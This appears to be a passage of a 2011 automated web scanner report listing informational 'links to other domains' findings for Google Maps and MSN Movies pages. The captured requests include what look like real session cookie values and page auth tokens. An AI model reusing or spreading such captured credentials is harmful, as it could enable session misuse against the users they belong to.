<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_14399208935720285870" jsaction="si.togglePanelStarring" jsprops="markerid:'C';b_s:2" data-authtoken="e7744373:vxfakcU5614YSfqoB6QmDikdj3U" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'D'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CGsQ_gswAw id="marker_D_2"><img alt="D" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconD"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_9154132767753732860" jsaction="si.togglePanelStarring" jsprops="markerid:'D';b_s:2" data-authtoken="d741656a:RG0YY1ApHGgsodK373xm9FaE8ck" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'E'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CHcQ_gswBA id="marker_E_2"><img alt="E" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconE"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_15850435201604415516" jsaction="si.togglePanelStarring" jsprops="markerid:'E';b_s:2" data-authtoken="5c40026f:RnE9y3gLCvKryNHnXmE8yG4_U2U" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'F'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CIIBEP4LMAU id="marker_F_2"><img alt="F" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconF"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_2044736647202142039" jsaction="si.togglePanelStarring" jsprops="markerid:'F';b_s:2" data-authtoken="353f80ad:-OBgIrhbIXy7xni9sn8JiE9jmg0" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'G'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CIwBEP4LMAY id="marker_G_2"><img alt="G" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconG"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_11708711014985907974" jsaction="si.togglePanelStarring" jsprops="markerid:'G';b_s:2" data-authtoken="5bd21d5:9uiJokKYvjJLNCCTUMzDPYCW6ck" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'H'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CJcBEP4LMAc id="marker_H_2"><img alt="H" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconH"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_14981001499426278450" jsaction="si.togglePanelStarring" jsprops="markerid:'H';b_s:2" data-authtoken="b77c3699:MvXr32cTNiM0xbi0WW2S3kbeWCg" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'I'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CKYBEP4LMAg id="marker_I_2"><img alt="I" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconI"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_7792436457638736636" jsaction="si.togglePanelStarring" jsprops="markerid:'I';b_s:2" data-authtoken="d230978a:voTqu0zqBcy1_GGlXwU8FRrDGUQ" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'J'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CLYBEP4LMAk id="marker_J_2"><img alt="J" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconJ"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_12589854273086256974" jsaction="si.togglePanelStarring" jsprops="markerid:'J';b_s:2" data-authtoken="8b7359b8:VNeOfrhzhUveneMFSdAyW__eE74" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div><img class="btp bt noprint" src="http://static.panoramio.com/photos/iw-thumbnail/5525436.jpg" /><div>
...[SNIP]...

17.146. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?file\u003dgoogleapi

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1

Request

GET /maps?file\u003dgoogleapi HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

17.147. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&cid=17132826041081042467&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_result&ct=placepage-link&resnum=4&ved=0CFEQ4gkwAw

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/docsearch_icon.png
http://maps.gstatic.com/intl/en_us/mapfiles/transit/iw/7/us-boston-metro.png
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&resnum=4&sa=N&hl=en&tab=l1

Request

GET /maps/place?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&cid=17132826041081042467&ei=_CVITc2VBYOClAeFy82iBA&sa=X&oi=local_result&ct=placepage-link&resnum=4&ved=0CFEQ4gkwAw HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><link rel="canonical" href="/maps/place?cid=17132826041081042467&q=millenium+boston" /><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>Millenium Day
...[SNIP]...
</div><a href="http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&resnum=4&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> <a id="m_launch" class="link-text" tabindex="8" href="/maps/mm?ie=UTF8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&hl=en&view=map&ved=0CDQQgAc&
...[SNIP]...
<a href="/maps?ie=UTF8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&hl=en&view=map&cid=17132826041081042467&iwloc=A" id="return-to-mapview"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="collapse-left3" title="Map View"/></a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span><a jsaction="bl.print" href="javascript:void(0)" ved="0CDcQgQc" jstrack="enlJTan5IangyQSE1Zm6DQ" id="print" log="print"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="mailto:?subject=Google%20Maps&body=http://maps.google.com/maps/place%3Fcid%3D17132826041081042467%26q%3Dmillenium%2Bboston%26gl%3Dus" jsaction="bl.email" onclick="return false;" ved="0CDgQggc" jstrack="enlJTan5IangyQSE1Zm6DQ" id="email" log="email"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="/maps/place?cid=17132826041081042467&q=millenium+boston&gl=us" rel="bookmark" ved="0CDkQgwc" jstrack="enlJTan5IangyQSE1Zm6DQ" id="pp-link" jsaction="link.show"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span class="link-text">
...[SNIP]...
<div class="ugc-maps-icon"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/docsearch_icon.png" /></div>
...[SNIP]...
<span class="pp-transit-list"> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transit/iw/7/us-boston-metro.png" class="pp-transit-icon"/> <span>
...[SNIP]...

17.148. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&cid=14399208935720285870

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transit/iw/7/bus.png
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&sa=N&hl=en&tab=l1

Request

GET /maps/place?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&cid=14399208935720285870 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:19 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><link rel="canonical" href="/maps/place?cid=14399208935720285870&q=millenium+boston" /><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>Millenium Mech
...[SNIP]...
</div><a href="http://www.youtube.com/results?um=1&ie=UTF-8&q=millenium+boston&fb=1&gl=us&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> <a id="m_launch" class="link-text" tabindex="8" href="/maps/mm?ie=UTF8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&hl=en&view=map&ved=0CDIQgAc&
...[SNIP]...
<a href="/maps?ie=UTF8&q=millenium+boston&fb=1&gl=us&hq=millenium&hnear=Boston,+MA&hl=en&view=map&cid=14399208935720285870&iwloc=A" id="return-to-mapview"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="collapse-left3" title="Map View"/></a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span><a jsaction="bl.print" href="javascript:void(0)" ved="0CDUQgQc" jstrack="e3lJTdbWKJi2ywS5oYHHDQ" id="print" log="print"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="mailto:?subject=Google%20Maps&body=http://maps.google.com/maps/place%3Fcid%3D14399208935720285870%26q%3Dmillenium%2Bboston%26gl%3Dus" jsaction="bl.email" onclick="return false;" ved="0CDYQggc" jstrack="e3lJTdbWKJi2ywS5oYHHDQ" id="email" log="email"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="/maps/place?cid=14399208935720285870&q=millenium+boston&gl=us" rel="bookmark" ved="0CDcQgwc" jstrack="e3lJTdbWKJi2ywS5oYHHDQ" id="pp-link" jsaction="link.show"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span class="link-text">
...[SNIP]...
<span class="pp-transit-list"> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/transit/iw/7/bus.png" class="pp-transit-icon"/> <span>
...[SNIP]...

17.149. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d

The response contains the following link to another domain:

http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1

Request

GET /maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.150. http://movies.msn.com/movies/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/movies/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://movies.msn.com/movies/article.aspx?news=625907

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entcss.s-msn.com/styles/tvvertical9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/150/News/Jan11/ColinFirth_150.jpg
http://entimg.s-msn.com/i/grandprix/Digg.gif
http://entimg.s-msn.com/i/grandprix/discuss.gif
http://entimg.s-msn.com/i/grandprix/leftNavBg.gif
http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif
http://entimg.s-msn.com/i/grandprix/mail.gif
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/grandprix/spacesBlog.gif
http://entimg.s-msn.com/i/ms/RssIcon.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-msn.com/js/ch/channels.css
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=MOVIES
http://www.bing.com/search?q=Anna+Paquin+&form=msnena
http://www.bing.com/search?q=Annette+Bening&form=msnena
http://www.bing.com/search?q=Christian+Bale&form=msnena
http://www.bing.com/search?q=Colin+Firth&form=msnena
http://www.bing.com/search?q=David+Fincher&form=msnena
http://www.bing.com/search?q=Dicky+Eklund&form=msnena
http://www.bing.com/search?q=Geoffrey+Rush&form=msnena
http://www.bing.com/search?q=Hailee+Steinfeld&form=msnena
http://www.bing.com/search?q=Helena+Bonham+Carter&form=msnena
